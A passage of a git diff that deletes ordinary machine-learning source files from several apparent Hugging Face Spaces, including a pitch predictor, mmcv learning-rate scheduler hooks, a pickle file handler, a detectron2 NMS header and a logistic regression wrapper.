print(out[2].size()) - net.get_params() diff --git a/spaces/Supedsa/rvc-models/lib/infer_pack/modules/F0Predictor/PMF0Predictor.py b/spaces/Supedsa/rvc-models/lib/infer_pack/modules/F0Predictor/PMF0Predictor.py deleted file mode 100644 index b2c592527a5966e6f8e79e8c52dc5b414246dcc6..0000000000000000000000000000000000000000 --- a/spaces/Supedsa/rvc-models/lib/infer_pack/modules/F0Predictor/PMF0Predictor.py +++ /dev/null @@ -1,97 +0,0 @@ -from lib.infer_pack.modules.F0Predictor.F0Predictor import F0Predictor -import parselmouth -import numpy as np - - -class PMF0Predictor(F0Predictor): - def __init__(self, hop_length=512, f0_min=50, f0_max=1100, sampling_rate=44100): - self.hop_length = hop_length - self.f0_min = f0_min - self.f0_max = f0_max - self.sampling_rate = sampling_rate - - def interpolate_f0(self, f0): - """ - 对F0进行插值处理 - """ - - data = np.reshape(f0, (f0.size, 1)) - - vuv_vector = np.zeros((data.size, 1), dtype=np.float32) - vuv_vector[data > 0.0] = 1.0 - vuv_vector[data <= 0.0] = 0.0 - - ip_data = data - - frame_number = data.size - last_value = 0.0 - for i in range(frame_number): - if data[i] <= 0.0: - j = i + 1 - for j in range(i + 1, frame_number): - if data[j] > 0.0: - break - if j < frame_number - 1: - if last_value > 0.0: - step = (data[j] - data[i - 1]) / float(j - i) - for k in range(i, j): - ip_data[k] = data[i - 1] + step * (k - i + 1) - else: - for k in range(i, j): - ip_data[k] = data[j] - else: - for k in range(i, frame_number): - ip_data[k] = last_value - else: - ip_data[i] = data[i] # 这里可能存在一个没有必要的拷贝 - last_value = data[i] - - return ip_data[:, 0], vuv_vector[:, 0] - - def compute_f0(self, wav, p_len=None): - x = wav - if p_len is None: - p_len = x.shape[0] // self.hop_length - else: - assert abs(p_len - x.shape[0] // self.hop_length) < 4, "pad length error" - time_step = self.hop_length / self.sampling_rate * 1000 - f0 = ( - parselmouth.Sound(x, self.sampling_rate) - .to_pitch_ac( - time_step=time_step / 1000, - voicing_threshold=0.6, - pitch_floor=self.f0_min, - pitch_ceiling=self.f0_max, - ) - .selected_array["frequency"] - ) - - pad_size = (p_len - len(f0) + 1) // 2 - if pad_size > 0 or p_len - len(f0) - pad_size > 0: - f0 = np.pad(f0, [[pad_size, p_len - len(f0) - pad_size]], mode="constant") - f0, uv = self.interpolate_f0(f0) - return f0 - - def compute_f0_uv(self, wav, p_len=None): - x = wav - if p_len is None: - p_len = x.shape[0] // self.hop_length - else: - assert abs(p_len - x.shape[0] // self.hop_length) < 4, "pad length error" - time_step = self.hop_length / self.sampling_rate * 1000 - f0 = ( - parselmouth.Sound(x, self.sampling_rate) - .to_pitch_ac( - time_step=time_step / 1000, - voicing_threshold=0.6, - pitch_floor=self.f0_min, - pitch_ceiling=self.f0_max, - ) - .selected_array["frequency"] - ) - - pad_size = (p_len - len(f0) + 1) // 2 - if pad_size > 0 or p_len - len(f0) - pad_size > 0: - f0 = np.pad(f0, [[pad_size, p_len - len(f0) - pad_size]], mode="constant") - f0, uv = self.interpolate_f0(f0) - return f0, uv diff --git a/spaces/Superlang/ImageProcessor/annotator/uniformer/mmcv/fileio/handlers/pickle_handler.py b/spaces/Superlang/ImageProcessor/annotator/uniformer/mmcv/fileio/handlers/pickle_handler.py deleted file mode 100644 index b37c79bed4ef9fd8913715e62dbe3fc5cafdc3aa..0000000000000000000000000000000000000000 --- a/spaces/Superlang/ImageProcessor/annotator/uniformer/mmcv/fileio/handlers/pickle_handler.py +++ /dev/null @@ -1,28 +0,0 @@ -# Copyright (c) OpenMMLab. All rights reserved. 
-import pickle - -from .base import BaseFileHandler - - -class PickleHandler(BaseFileHandler): - - str_like = False - - def load_from_fileobj(self, file, **kwargs): - return pickle.load(file, **kwargs) - - def load_from_path(self, filepath, **kwargs): - return super(PickleHandler, self).load_from_path( - filepath, mode='rb', **kwargs) - - def dump_to_str(self, obj, **kwargs): - kwargs.setdefault('protocol', 2) - return pickle.dumps(obj, **kwargs) - - def dump_to_fileobj(self, obj, file, **kwargs): - kwargs.setdefault('protocol', 2) - pickle.dump(obj, file, **kwargs) - - def dump_to_path(self, obj, filepath, **kwargs): - super(PickleHandler, self).dump_to_path( - obj, filepath, mode='wb', **kwargs) diff --git a/spaces/Superlang/ImageProcessor/annotator/uniformer/mmcv/runner/hooks/lr_updater.py b/spaces/Superlang/ImageProcessor/annotator/uniformer/mmcv/runner/hooks/lr_updater.py deleted file mode 100644 index 6365908ddf6070086de2ffc0afada46ed2f32256..0000000000000000000000000000000000000000 --- a/spaces/Superlang/ImageProcessor/annotator/uniformer/mmcv/runner/hooks/lr_updater.py +++ /dev/null @@ -1,670 +0,0 @@ -# Copyright (c) OpenMMLab. All rights reserved. -import numbers -from math import cos, pi - -import annotator.uniformer.mmcv as mmcv -from .hook import HOOKS, Hook - - -class LrUpdaterHook(Hook): - """LR Scheduler in MMCV. - - Args: - by_epoch (bool): LR changes epoch by epoch - warmup (string): Type of warmup used. It can be None(use no warmup), - 'constant', 'linear' or 'exp' - warmup_iters (int): The number of iterations or epochs that warmup - lasts - warmup_ratio (float): LR used at the beginning of warmup equals to - warmup_ratio * initial_lr - warmup_by_epoch (bool): When warmup_by_epoch == True, warmup_iters - means the number of epochs that warmup lasts, otherwise means the - number of iteration that warmup lasts - """ - - def __init__(self, - by_epoch=True, - warmup=None, - warmup_iters=0, - warmup_ratio=0.1, - warmup_by_epoch=False): - # validate the "warmup" argument - if warmup is not None: - if warmup not in ['constant', 'linear', 'exp']: - raise ValueError( - f'"{warmup}" is not a supported type for warming up, valid' - ' types are "constant" and "linear"') - if warmup is not None: - assert warmup_iters > 0, \ - '"warmup_iters" must be a positive integer' - assert 0 < warmup_ratio <= 1.0, \ - '"warmup_ratio" must be in range (0,1]' - - self.by_epoch = by_epoch - self.warmup = warmup - self.warmup_iters = warmup_iters - self.warmup_ratio = warmup_ratio - self.warmup_by_epoch = warmup_by_epoch - - if self.warmup_by_epoch: - self.warmup_epochs = self.warmup_iters - self.warmup_iters = None - else: - self.warmup_epochs = None - - self.base_lr = [] # initial lr for all param groups - self.regular_lr = [] # expected lr if no warming up is performed - - def _set_lr(self, runner, lr_groups): - if isinstance(runner.optimizer, dict): - for k, optim in runner.optimizer.items(): - for param_group, lr in zip(optim.param_groups, lr_groups[k]): - param_group['lr'] = lr - else: - for param_group, lr in zip(runner.optimizer.param_groups, - lr_groups): - param_group['lr'] = lr - - def get_lr(self, runner, base_lr): - raise NotImplementedError - - def get_regular_lr(self, runner): - if isinstance(runner.optimizer, dict): - lr_groups = {} - for k in runner.optimizer.keys(): - _lr_group = [ - self.get_lr(runner, _base_lr) - for _base_lr in self.base_lr[k] - ] - lr_groups.update({k: _lr_group}) - - return lr_groups - else: - return [self.get_lr(runner, _base_lr) for _base_lr in self.base_lr] 
- - def get_warmup_lr(self, cur_iters): - - def _get_warmup_lr(cur_iters, regular_lr): - if self.warmup == 'constant': - warmup_lr = [_lr * self.warmup_ratio for _lr in regular_lr] - elif self.warmup == 'linear': - k = (1 - cur_iters / self.warmup_iters) * (1 - - self.warmup_ratio) - warmup_lr = [_lr * (1 - k) for _lr in regular_lr] - elif self.warmup == 'exp': - k = self.warmup_ratio**(1 - cur_iters / self.warmup_iters) - warmup_lr = [_lr * k for _lr in regular_lr] - return warmup_lr - - if isinstance(self.regular_lr, dict): - lr_groups = {} - for key, regular_lr in self.regular_lr.items(): - lr_groups[key] = _get_warmup_lr(cur_iters, regular_lr) - return lr_groups - else: - return _get_warmup_lr(cur_iters, self.regular_lr) - - def before_run(self, runner): - # NOTE: when resuming from a checkpoint, if 'initial_lr' is not saved, - # it will be set according to the optimizer params - if isinstance(runner.optimizer, dict): - self.base_lr = {} - for k, optim in runner.optimizer.items(): - for group in optim.param_groups: - group.setdefault('initial_lr', group['lr']) - _base_lr = [ - group['initial_lr'] for group in optim.param_groups - ] - self.base_lr.update({k: _base_lr}) - else: - for group in runner.optimizer.param_groups: - group.setdefault('initial_lr', group['lr']) - self.base_lr = [ - group['initial_lr'] for group in runner.optimizer.param_groups - ] - - def before_train_epoch(self, runner): - if self.warmup_iters is None: - epoch_len = len(runner.data_loader) - self.warmup_iters = self.warmup_epochs * epoch_len - - if not self.by_epoch: - return - - self.regular_lr = self.get_regular_lr(runner) - self._set_lr(runner, self.regular_lr) - - def before_train_iter(self, runner): - cur_iter = runner.iter - if not self.by_epoch: - self.regular_lr = self.get_regular_lr(runner) - if self.warmup is None or cur_iter >= self.warmup_iters: - self._set_lr(runner, self.regular_lr) - else: - warmup_lr = self.get_warmup_lr(cur_iter) - self._set_lr(runner, warmup_lr) - elif self.by_epoch: - if self.warmup is None or cur_iter > self.warmup_iters: - return - elif cur_iter == self.warmup_iters: - self._set_lr(runner, self.regular_lr) - else: - warmup_lr = self.get_warmup_lr(cur_iter) - self._set_lr(runner, warmup_lr) - - -@HOOKS.register_module() -class FixedLrUpdaterHook(LrUpdaterHook): - - def __init__(self, **kwargs): - super(FixedLrUpdaterHook, self).__init__(**kwargs) - - def get_lr(self, runner, base_lr): - return base_lr - - -@HOOKS.register_module() -class StepLrUpdaterHook(LrUpdaterHook): - """Step LR scheduler with min_lr clipping. - - Args: - step (int | list[int]): Step to decay the LR. If an int value is given, - regard it as the decay interval. If a list is given, decay LR at - these steps. - gamma (float, optional): Decay LR ratio. Default: 0.1. - min_lr (float, optional): Minimum LR value to keep. If LR after decay - is lower than `min_lr`, it will be clipped to this value. If None - is given, we don't perform lr clipping. Default: None. 
- """ - - def __init__(self, step, gamma=0.1, min_lr=None, **kwargs): - if isinstance(step, list): - assert mmcv.is_list_of(step, int) - assert all([s > 0 for s in step]) - elif isinstance(step, int): - assert step > 0 - else: - raise TypeError('"step" must be a list or integer') - self.step = step - self.gamma = gamma - self.min_lr = min_lr - super(StepLrUpdaterHook, self).__init__(**kwargs) - - def get_lr(self, runner, base_lr): - progress = runner.epoch if self.by_epoch else runner.iter - - # calculate exponential term - if isinstance(self.step, int): - exp = progress // self.step - else: - exp = len(self.step) - for i, s in enumerate(self.step): - if progress < s: - exp = i - break - - lr = base_lr * (self.gamma**exp) - if self.min_lr is not None: - # clip to a minimum value - lr = max(lr, self.min_lr) - return lr - - -@HOOKS.register_module() -class ExpLrUpdaterHook(LrUpdaterHook): - - def __init__(self, gamma, **kwargs): - self.gamma = gamma - super(ExpLrUpdaterHook, self).__init__(**kwargs) - - def get_lr(self, runner, base_lr): - progress = runner.epoch if self.by_epoch else runner.iter - return base_lr * self.gamma**progress - - -@HOOKS.register_module() -class PolyLrUpdaterHook(LrUpdaterHook): - - def __init__(self, power=1., min_lr=0., **kwargs): - self.power = power - self.min_lr = min_lr - super(PolyLrUpdaterHook, self).__init__(**kwargs) - - def get_lr(self, runner, base_lr): - if self.by_epoch: - progress = runner.epoch - max_progress = runner.max_epochs - else: - progress = runner.iter - max_progress = runner.max_iters - coeff = (1 - progress / max_progress)**self.power - return (base_lr - self.min_lr) * coeff + self.min_lr - - -@HOOKS.register_module() -class InvLrUpdaterHook(LrUpdaterHook): - - def __init__(self, gamma, power=1., **kwargs): - self.gamma = gamma - self.power = power - super(InvLrUpdaterHook, self).__init__(**kwargs) - - def get_lr(self, runner, base_lr): - progress = runner.epoch if self.by_epoch else runner.iter - return base_lr * (1 + self.gamma * progress)**(-self.power) - - -@HOOKS.register_module() -class CosineAnnealingLrUpdaterHook(LrUpdaterHook): - - def __init__(self, min_lr=None, min_lr_ratio=None, **kwargs): - assert (min_lr is None) ^ (min_lr_ratio is None) - self.min_lr = min_lr - self.min_lr_ratio = min_lr_ratio - super(CosineAnnealingLrUpdaterHook, self).__init__(**kwargs) - - def get_lr(self, runner, base_lr): - if self.by_epoch: - progress = runner.epoch - max_progress = runner.max_epochs - else: - progress = runner.iter - max_progress = runner.max_iters - - if self.min_lr_ratio is not None: - target_lr = base_lr * self.min_lr_ratio - else: - target_lr = self.min_lr - return annealing_cos(base_lr, target_lr, progress / max_progress) - - -@HOOKS.register_module() -class FlatCosineAnnealingLrUpdaterHook(LrUpdaterHook): - """Flat + Cosine lr schedule. - - Modified from https://github.com/fastai/fastai/blob/master/fastai/callback/schedule.py#L128 # noqa: E501 - - Args: - start_percent (float): When to start annealing the learning rate - after the percentage of the total training steps. - The value should be in range [0, 1). - Default: 0.75 - min_lr (float, optional): The minimum lr. Default: None. - min_lr_ratio (float, optional): The ratio of minimum lr to the base lr. - Either `min_lr` or `min_lr_ratio` should be specified. - Default: None. 
- """ - - def __init__(self, - start_percent=0.75, - min_lr=None, - min_lr_ratio=None, - **kwargs): - assert (min_lr is None) ^ (min_lr_ratio is None) - if start_percent < 0 or start_percent > 1 or not isinstance( - start_percent, float): - raise ValueError( - 'expected float between 0 and 1 start_percent, but ' - f'got {start_percent}') - self.start_percent = start_percent - self.min_lr = min_lr - self.min_lr_ratio = min_lr_ratio - super(FlatCosineAnnealingLrUpdaterHook, self).__init__(**kwargs) - - def get_lr(self, runner, base_lr): - if self.by_epoch: - start = round(runner.max_epochs * self.start_percent) - progress = runner.epoch - start - max_progress = runner.max_epochs - start - else: - start = round(runner.max_iters * self.start_percent) - progress = runner.iter - start - max_progress = runner.max_iters - start - - if self.min_lr_ratio is not None: - target_lr = base_lr * self.min_lr_ratio - else: - target_lr = self.min_lr - - if progress < 0: - return base_lr - else: - return annealing_cos(base_lr, target_lr, progress / max_progress) - - -@HOOKS.register_module() -class CosineRestartLrUpdaterHook(LrUpdaterHook): - """Cosine annealing with restarts learning rate scheme. - - Args: - periods (list[int]): Periods for each cosine anneling cycle. - restart_weights (list[float], optional): Restart weights at each - restart iteration. Default: [1]. - min_lr (float, optional): The minimum lr. Default: None. - min_lr_ratio (float, optional): The ratio of minimum lr to the base lr. - Either `min_lr` or `min_lr_ratio` should be specified. - Default: None. - """ - - def __init__(self, - periods, - restart_weights=[1], - min_lr=None, - min_lr_ratio=None, - **kwargs): - assert (min_lr is None) ^ (min_lr_ratio is None) - self.periods = periods - self.min_lr = min_lr - self.min_lr_ratio = min_lr_ratio - self.restart_weights = restart_weights - assert (len(self.periods) == len(self.restart_weights) - ), 'periods and restart_weights should have the same length.' - super(CosineRestartLrUpdaterHook, self).__init__(**kwargs) - - self.cumulative_periods = [ - sum(self.periods[0:i + 1]) for i in range(0, len(self.periods)) - ] - - def get_lr(self, runner, base_lr): - if self.by_epoch: - progress = runner.epoch - else: - progress = runner.iter - - if self.min_lr_ratio is not None: - target_lr = base_lr * self.min_lr_ratio - else: - target_lr = self.min_lr - - idx = get_position_from_periods(progress, self.cumulative_periods) - current_weight = self.restart_weights[idx] - nearest_restart = 0 if idx == 0 else self.cumulative_periods[idx - 1] - current_periods = self.periods[idx] - - alpha = min((progress - nearest_restart) / current_periods, 1) - return annealing_cos(base_lr, target_lr, alpha, current_weight) - - -def get_position_from_periods(iteration, cumulative_periods): - """Get the position from a period list. - - It will return the index of the right-closest number in the period list. - For example, the cumulative_periods = [100, 200, 300, 400], - if iteration == 50, return 0; - if iteration == 210, return 2; - if iteration == 300, return 3. - - Args: - iteration (int): Current iteration. - cumulative_periods (list[int]): Cumulative period list. - - Returns: - int: The position of the right-closest number in the period list. 
- """ - for i, period in enumerate(cumulative_periods): - if iteration < period: - return i - raise ValueError(f'Current iteration {iteration} exceeds ' - f'cumulative_periods {cumulative_periods}') - - -@HOOKS.register_module() -class CyclicLrUpdaterHook(LrUpdaterHook): - """Cyclic LR Scheduler. - - Implement the cyclical learning rate policy (CLR) described in - https://arxiv.org/pdf/1506.01186.pdf - - Different from the original paper, we use cosine annealing rather than - triangular policy inside a cycle. This improves the performance in the - 3D detection area. - - Args: - by_epoch (bool): Whether to update LR by epoch. - target_ratio (tuple[float]): Relative ratio of the highest LR and the - lowest LR to the initial LR. - cyclic_times (int): Number of cycles during training - step_ratio_up (float): The ratio of the increasing process of LR in - the total cycle. - anneal_strategy (str): {'cos', 'linear'} - Specifies the annealing strategy: 'cos' for cosine annealing, - 'linear' for linear annealing. Default: 'cos'. - """ - - def __init__(self, - by_epoch=False, - target_ratio=(10, 1e-4), - cyclic_times=1, - step_ratio_up=0.4, - anneal_strategy='cos', - **kwargs): - if isinstance(target_ratio, float): - target_ratio = (target_ratio, target_ratio / 1e5) - elif isinstance(target_ratio, tuple): - target_ratio = (target_ratio[0], target_ratio[0] / 1e5) \ - if len(target_ratio) == 1 else target_ratio - else: - raise ValueError('target_ratio should be either float ' - f'or tuple, got {type(target_ratio)}') - - assert len(target_ratio) == 2, \ - '"target_ratio" must be list or tuple of two floats' - assert 0 <= step_ratio_up < 1.0, \ - '"step_ratio_up" must be in range [0,1)' - - self.target_ratio = target_ratio - self.cyclic_times = cyclic_times - self.step_ratio_up = step_ratio_up - self.lr_phases = [] # init lr_phases - # validate anneal_strategy - if anneal_strategy not in ['cos', 'linear']: - raise ValueError('anneal_strategy must be one of "cos" or ' - f'"linear", instead got {anneal_strategy}') - elif anneal_strategy == 'cos': - self.anneal_func = annealing_cos - elif anneal_strategy == 'linear': - self.anneal_func = annealing_linear - - assert not by_epoch, \ - 'currently only support "by_epoch" = False' - super(CyclicLrUpdaterHook, self).__init__(by_epoch, **kwargs) - - def before_run(self, runner): - super(CyclicLrUpdaterHook, self).before_run(runner) - # initiate lr_phases - # total lr_phases are separated as up and down - max_iter_per_phase = runner.max_iters // self.cyclic_times - iter_up_phase = int(self.step_ratio_up * max_iter_per_phase) - self.lr_phases.append( - [0, iter_up_phase, max_iter_per_phase, 1, self.target_ratio[0]]) - self.lr_phases.append([ - iter_up_phase, max_iter_per_phase, max_iter_per_phase, - self.target_ratio[0], self.target_ratio[1] - ]) - - def get_lr(self, runner, base_lr): - curr_iter = runner.iter - for (start_iter, end_iter, max_iter_per_phase, start_ratio, - end_ratio) in self.lr_phases: - curr_iter %= max_iter_per_phase - if start_iter <= curr_iter < end_iter: - progress = curr_iter - start_iter - return self.anneal_func(base_lr * start_ratio, - base_lr * end_ratio, - progress / (end_iter - start_iter)) - - -@HOOKS.register_module() -class OneCycleLrUpdaterHook(LrUpdaterHook): - """One Cycle LR Scheduler. - - The 1cycle learning rate policy changes the learning rate after every - batch. 
The one cycle learning rate policy is described in - https://arxiv.org/pdf/1708.07120.pdf - - Args: - max_lr (float or list): Upper learning rate boundaries in the cycle - for each parameter group. - total_steps (int, optional): The total number of steps in the cycle. - Note that if a value is not provided here, it will be the max_iter - of runner. Default: None. - pct_start (float): The percentage of the cycle (in number of steps) - spent increasing the learning rate. - Default: 0.3 - anneal_strategy (str): {'cos', 'linear'} - Specifies the annealing strategy: 'cos' for cosine annealing, - 'linear' for linear annealing. - Default: 'cos' - div_factor (float): Determines the initial learning rate via - initial_lr = max_lr/div_factor - Default: 25 - final_div_factor (float): Determines the minimum learning rate via - min_lr = initial_lr/final_div_factor - Default: 1e4 - three_phase (bool): If three_phase is True, use a third phase of the - schedule to annihilate the learning rate according to - final_div_factor instead of modifying the second phase (the first - two phases will be symmetrical about the step indicated by - pct_start). - Default: False - """ - - def __init__(self, - max_lr, - total_steps=None, - pct_start=0.3, - anneal_strategy='cos', - div_factor=25, - final_div_factor=1e4, - three_phase=False, - **kwargs): - # validate by_epoch, currently only support by_epoch = False - if 'by_epoch' not in kwargs: - kwargs['by_epoch'] = False - else: - assert not kwargs['by_epoch'], \ - 'currently only support "by_epoch" = False' - if not isinstance(max_lr, (numbers.Number, list, dict)): - raise ValueError('the type of max_lr must be the one of list or ' - f'dict, but got {type(max_lr)}') - self._max_lr = max_lr - if total_steps is not None: - if not isinstance(total_steps, int): - raise ValueError('the type of total_steps must be int, but' - f'got {type(total_steps)}') - self.total_steps = total_steps - # validate pct_start - if pct_start < 0 or pct_start > 1 or not isinstance(pct_start, float): - raise ValueError('expected float between 0 and 1 pct_start, but ' - f'got {pct_start}') - self.pct_start = pct_start - # validate anneal_strategy - if anneal_strategy not in ['cos', 'linear']: - raise ValueError('anneal_strategy must be one of "cos" or ' - f'"linear", instead got {anneal_strategy}') - elif anneal_strategy == 'cos': - self.anneal_func = annealing_cos - elif anneal_strategy == 'linear': - self.anneal_func = annealing_linear - self.div_factor = div_factor - self.final_div_factor = final_div_factor - self.three_phase = three_phase - self.lr_phases = [] # init lr_phases - super(OneCycleLrUpdaterHook, self).__init__(**kwargs) - - def before_run(self, runner): - if hasattr(self, 'total_steps'): - total_steps = self.total_steps - else: - total_steps = runner.max_iters - if total_steps < runner.max_iters: - raise ValueError( - 'The total steps must be greater than or equal to max ' - f'iterations {runner.max_iters} of runner, but total steps ' - f'is {total_steps}.') - - if isinstance(runner.optimizer, dict): - self.base_lr = {} - for k, optim in runner.optimizer.items(): - _max_lr = format_param(k, optim, self._max_lr) - self.base_lr[k] = [lr / self.div_factor for lr in _max_lr] - for group, lr in zip(optim.param_groups, self.base_lr[k]): - group.setdefault('initial_lr', lr) - else: - k = type(runner.optimizer).__name__ - _max_lr = format_param(k, runner.optimizer, self._max_lr) - self.base_lr = [lr / self.div_factor for lr in _max_lr] - for group, lr in zip(runner.optimizer.param_groups, 
self.base_lr): - group.setdefault('initial_lr', lr) - - if self.three_phase: - self.lr_phases.append( - [float(self.pct_start * total_steps) - 1, 1, self.div_factor]) - self.lr_phases.append([ - float(2 * self.pct_start * total_steps) - 2, self.div_factor, 1 - ]) - self.lr_phases.append( - [total_steps - 1, 1, 1 / self.final_div_factor]) - else: - self.lr_phases.append( - [float(self.pct_start * total_steps) - 1, 1, self.div_factor]) - self.lr_phases.append( - [total_steps - 1, self.div_factor, 1 / self.final_div_factor]) - - def get_lr(self, runner, base_lr): - curr_iter = runner.iter - start_iter = 0 - for i, (end_iter, start_lr, end_lr) in enumerate(self.lr_phases): - if curr_iter <= end_iter: - pct = (curr_iter - start_iter) / (end_iter - start_iter) - lr = self.anneal_func(base_lr * start_lr, base_lr * end_lr, - pct) - break - start_iter = end_iter - return lr - - -def annealing_cos(start, end, factor, weight=1): - """Calculate annealing cos learning rate. - - Cosine anneal from `weight * start + (1 - weight) * end` to `end` as - percentage goes from 0.0 to 1.0. - - Args: - start (float): The starting learning rate of the cosine annealing. - end (float): The ending learing rate of the cosine annealing. - factor (float): The coefficient of `pi` when calculating the current - percentage. Range from 0.0 to 1.0. - weight (float, optional): The combination factor of `start` and `end` - when calculating the actual starting learning rate. Default to 1. - """ - cos_out = cos(pi * factor) + 1 - return end + 0.5 * weight * (start - end) * cos_out - - -def annealing_linear(start, end, factor): - """Calculate annealing linear learning rate. - - Linear anneal from `start` to `end` as percentage goes from 0.0 to 1.0. - - Args: - start (float): The starting learning rate of the linear annealing. - end (float): The ending learing rate of the linear annealing. - factor (float): The coefficient of `pi` when calculating the current - percentage. Range from 0.0 to 1.0. 
- """ - return start + (end - start) * factor - - -def format_param(name, optim, param): - if isinstance(param, numbers.Number): - return [param] * len(optim.param_groups) - elif isinstance(param, (list, tuple)): # multi param groups - if len(param) != len(optim.param_groups): - raise ValueError(f'expected {len(optim.param_groups)} ' - f'values for {name}, got {len(param)}') - return param - else: # multi optimizers - if name not in param: - raise KeyError(f'{name} is not found in {param.keys()}') - return param[name] diff --git a/spaces/TencentARC/VLog/models/grit_src/third_party/CenterNet2/configs/common/models/fcos.py b/spaces/TencentARC/VLog/models/grit_src/third_party/CenterNet2/configs/common/models/fcos.py deleted file mode 100644 index 1c752029b7fc64ec375a55182e5342c9eb48bb33..0000000000000000000000000000000000000000 --- a/spaces/TencentARC/VLog/models/grit_src/third_party/CenterNet2/configs/common/models/fcos.py +++ /dev/null @@ -1,23 +0,0 @@ -from detectron2.modeling.meta_arch.fcos import FCOS, FCOSHead - -from .retinanet import model - -model._target_ = FCOS - -del model.anchor_generator -del model.box2box_transform -del model.anchor_matcher -del model.input_format - -# Use P5 instead of C5 to compute P6/P7 -# (Sec 2.2 of https://arxiv.org/abs/2006.09214) -model.backbone.top_block.in_feature = "p5" -model.backbone.top_block.in_channels = 256 - -# New score threshold determined based on sqrt(cls_score * centerness) -model.test_score_thresh = 0.2 -model.test_nms_thresh = 0.6 - -model.head._target_ = FCOSHead -del model.head.num_anchors -model.head.norm = "GN" diff --git a/spaces/TencentARC/VLog/models/grit_src/third_party/CenterNet2/detectron2/layers/csrc/nms_rotated/nms_rotated.h b/spaces/TencentARC/VLog/models/grit_src/third_party/CenterNet2/detectron2/layers/csrc/nms_rotated/nms_rotated.h deleted file mode 100644 index 12aca388e47b12dafd20999f2991a9d42f4b904b..0000000000000000000000000000000000000000 --- a/spaces/TencentARC/VLog/models/grit_src/third_party/CenterNet2/detectron2/layers/csrc/nms_rotated/nms_rotated.h +++ /dev/null @@ -1,39 +0,0 @@ -// Copyright (c) Facebook, Inc. and its affiliates. 
-#pragma once -#include - -namespace detectron2 { - -at::Tensor nms_rotated_cpu( - const at::Tensor& dets, - const at::Tensor& scores, - const double iou_threshold); - -#if defined(WITH_CUDA) || defined(WITH_HIP) -at::Tensor nms_rotated_cuda( - const at::Tensor& dets, - const at::Tensor& scores, - const double iou_threshold); -#endif - -// Interface for Python -// inline is needed to prevent multiple function definitions when this header is -// included by different cpps -inline at::Tensor nms_rotated( - const at::Tensor& dets, - const at::Tensor& scores, - const double iou_threshold) { - assert(dets.device().is_cuda() == scores.device().is_cuda()); - if (dets.device().is_cuda()) { -#if defined(WITH_CUDA) || defined(WITH_HIP) - return nms_rotated_cuda( - dets.contiguous(), scores.contiguous(), iou_threshold); -#else - AT_ERROR("Detectron2 is not compiled with GPU support!"); -#endif - } - - return nms_rotated_cpu(dets.contiguous(), scores.contiguous(), iou_threshold); -} - -} // namespace detectron2 diff --git a/spaces/ThirdEyeData/Customer-Conversion-Prediction/supv/lrd.py b/spaces/ThirdEyeData/Customer-Conversion-Prediction/supv/lrd.py deleted file mode 100644 index b476e477f642adfb93e5a71b19b0877f6b3eda92..0000000000000000000000000000000000000000 --- a/spaces/ThirdEyeData/Customer-Conversion-Prediction/supv/lrd.py +++ /dev/null @@ -1,112 +0,0 @@ -#!/usr/local/bin/python3 - -# avenir-python: Machine Learning -# Author: Pranab Ghosh -# -# Licensed under the Apache License, Version 2.0 (the "License"); you -# may not use this file except in compliance with the License. You may -# obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or -# implied. See the License for the specific language governing -# permissions and limitations under the License. 
- -# Package imports -import os -import sys -import matplotlib.pyplot as plt -import numpy as np -import sklearn as sk -import sklearn.linear_model -import matplotlib -import random -import jprops -from sklearn.linear_model import LogisticRegression -from random import randint -sys.path.append(os.path.abspath("../lib")) -from util import * -from mlutil import * -from pasearch import * -from bacl import * - -# logistic regression classification -class LogisticRegressionDiscriminant(BaseClassifier): - - def __init__(self, configFile): - defValues = {} - defValues["common.mode"] = ("train", None) - defValues["common.model.directory"] = ("model", None) - defValues["common.model.file"] = (None, None) - defValues["common.scale.file.path"] = (None, "missing scale file path") - defValues["common.preprocessing"] = (None, None) - defValues["common.verbose"] = (False, None) - defValues["train.data.file"] = (None, "missing training data file") - defValues["train.data.fields"] = (None, "missing training data field ordinals") - defValues["train.data.feature.fields"] = (None, "missing training data feature field ordinals") - defValues["train.data.class.field"] = (None, "missing class field ordinal") - defValues["train.validation"] = ("kfold", None) - defValues["train.num.folds"] = (5, None) - defValues["train.penalty"] = ("l2", None) - defValues["train.dual"] = (False, None) - defValues["train.tolerance"] = (0.0001, None) - defValues["train.regularization"] = (1.0, None) - defValues["train.fit.intercept"] = (True, None) - defValues["train.intercept.scaling"] = (1.0, None) - defValues["train.class.weight"] = (None, None) - defValues["train.random.state"] = (None, None) - defValues["train.solver"] = ("liblinear", None) - defValues["train.max.iter"] = (100, None) - defValues["train.multi.class"] = ("ovr", None) - defValues["train.verbose"] = (0, None) - defValues["train.warm.start"] = (False, None) - defValues["train.num.jobs"] = (None, None) - defValues["train.l1.ratio"] = (None, None) - defValues["train.success.criterion"] = ("error", None) - defValues["train.model.save"] = (False, None) - defValues["train.score.method"] = ("accuracy", None) - defValues["train.search.param.strategy"] = (None, None) - defValues["train.search.params"] = (None, None) - defValues["predict.data.file"] = (None, None) - defValues["predict.data.fields"] = (None, "missing data field ordinals") - defValues["predict.data.feature.fields"] = (None, "missing data feature field ordinals") - defValues["predict.use.saved.model"] = (False, None) - defValues["validate.data.file"] = (None, "missing validation data file") - defValues["validate.data.fields"] = (None, "missing validation data field ordinals") - defValues["validate.data.feature.fields"] = (None, "missing validation data feature field ordinals") - defValues["validate.data.class.field"] = (None, "missing class field ordinal") - defValues["validate.use.saved.model"] = (False, None) - defValues["validate.score.method"] = ("accuracy", None) - - super(LogisticRegressionDiscriminant, self).__init__(configFile, defValues, __name__) - - # builds model object - def buildModel(self): - print ("...building logistic regression model") - penalty = self.config.getStringConfig("train.penalty")[0] - dual = self.config.getBooleanConfig("train.dual")[0] - tol = self.config.getFloatConfig("train.tolerance")[0] - c = self.config.getFloatConfig("train.regularization")[0] - fitIntercept = self.config.getBooleanConfig("train.fit.intercept")[0] - interceptScaling = 
